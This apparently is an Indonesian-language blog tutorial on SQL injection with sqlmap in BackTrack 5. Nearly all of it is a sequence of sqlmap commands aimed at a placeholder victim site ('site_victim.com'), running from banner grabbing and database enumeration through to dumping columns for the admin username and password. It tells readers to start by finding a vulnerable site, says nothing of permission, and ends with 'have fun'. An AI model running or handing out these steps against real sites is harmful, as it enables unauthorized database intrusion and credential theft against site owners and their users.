SQLMap Injection

15.54.00

Kali ini saya membuat tutorial tentang SQL Injection menggunakan tool SQLMap di BackTrack 5. Apa itu SQLMap ?

sqlmap adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

Langkah - langkah yang harus dilakukan adalah sebagai berikut :

1. Pertama yang harus dipersiapkan adalah situs yang vulnerable.
2. Masuk ke direktori sqlmap
cd /pentest/database/sqlmap
3. Lalu jalankan perintah berikut
./sqlmap.py -u http://site_victim.com/indeks.html?staff_id=8 --random-agent --thread 10 --banner
    Hal yang dilakukan diatas adalah untuk mencari celah melalui banner yang ada dalam situs tersebut.

4. Selanjutnya mencari database dan pengguna terakhir dari web tersebut
./sqlmap.py -u http://site-victim.com/indeks.html?staff_id=8 --random-agent --thread 10 --current-user --current-db
    contohnya akan tampil seperti ini :
    [*] mm_mm >> database dari situs tersebut
    [*] mm_mmadmin@localhost >> admin situs tersebut

5. Lakukan injeksi pada database
./sqlmap.py -u http://site_victim.com/indeks.html?staff_id=8 --random-agent --thread 10 --dbs
6. Setelah nama database di dapatkan masukkan perintah berikut untuk melihat isi tables pada database
./sqlmap.py -u http://site_victim.com/indeks.html?staff_id=8 --random-agent --thread 10 -D nama_database --tables
7. Cari columns dari tables database tersebut.
./sqlmap.py -u http://site_victim.com/indeks.html?staff_id=8 --random-agent --thread 10 -D nama_database --columns
8.  Columns didapat, masuk ke column untuk mencari username dan password admin
./sqlmap.py -u http://site_victim.com/indeks.html?staff_id=8 --random-agent --thread 10 -D nama_database -C nama_columns --dump
9. Selamat bersenang - senang
Diharapkan koment nya.


Sumber : Berbagai Sumber 

Share This Story

Tags:

You Might Also Like

0 komentar

Subscribe